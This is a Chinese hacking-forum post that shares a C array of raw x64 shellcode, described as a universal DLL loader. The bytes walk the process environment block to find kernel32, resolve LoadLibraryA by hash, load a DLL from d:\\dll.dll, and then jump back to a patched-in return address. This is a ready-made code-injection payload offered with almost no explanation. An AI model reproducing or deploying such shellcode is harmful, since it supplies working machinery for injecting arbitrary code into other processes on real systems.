请选择 进入手机版 | 继续访问电脑版
微信扫一扫 分享朋友圈

已有 360 人浏览分享

开启左侧

x64的一段shellcode,加载dll用的,支持所有x64操作系统

[复制链接]
360 0
  1. unsigned char shellcode[] = "\xeb\x19\x59\xff\xd0\x48\x83\xc4\x28"
  2. "\x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xe0\x90\x90\x90\x90\x90\x90"  //mov rax,0xxxxx jmp rax
  3. "\x48\x83\xEC\x28\x48\x83\xE4\xF0\x65\x4C\x8B\x24\x25\x60\x00\x00\x00"
  4. "\x4D\x8B\x64\x24\x18\x4D\x8B\x64\x24\x20\x4D\x8B\x24\x24"
  5. "\x4D\x8B\x7C\x24\x20\x4D\x8B\x24\x24\x4D\x8B\x64\x24\x20"
  6. "\x48\x31\xC0\x4D\x31\xF6\x48\x31\xDB\x48\x31\xc9\x48\x31"
  7. "\xf6\x41\x8B\x44\x24\x3C\x4C\x01\xE0\x44\x8B\xB0\x88\x00"
  8. "\x00\x00\x4D\x01\xE6\x41\x8B\x4e\x18\x41\x8B\x5E\x20\x4c"
  9. "\x01\xe3\xE3\x8f\x48\xFF\xC9\x8B\x34\x8b\x4C\x01\xE6\x31"
  10. "\xFF\x31\xC0\xFC\xAC\x84\xC0\x74\x07\xC1\xCF\x0D\x01\xC7"
  11. "\xEB\xF4\x81\xFF\x8e\x4e\x0e\xec\x75\xDc\x41\x8B\x5E\x24"
  12. "\x4C\x01\xE3\x48\x31\xc0\x66\x8b\x04\x4b\x41\x8B\x5E\x1C"
  13. "\x4C\x01\xE3\x8B\x04\x83\x4C\x01\xE0\xe8\x4a\xff\xff\xff"
  14. "d:\\dll.dll";
复制代码


不积跬步,无以至千里
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

0

关注

38

粉丝

1152

主题
热门资讯
网友晒图
图文推荐
  • 联系我们
  • 邮箱:admin@c0ks.com(请把#改成@)
  • 电话:18530790808
  • QQ客服 1031180668
  • 工作时间:周一至周五(早上9点至下午5点)
  • 微信二维码

  • 扫描访问手机版

Archiver|手机版|小黑屋|从零开始

GMT+8, 2020-6-4 16:38 , Processed in 0.090221 second(s), 34 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

  • QQ: 1031180668

    客服电话

    18530790808

    电子邮件

    admin@c0ks.com

    在线时间:8:00-16:00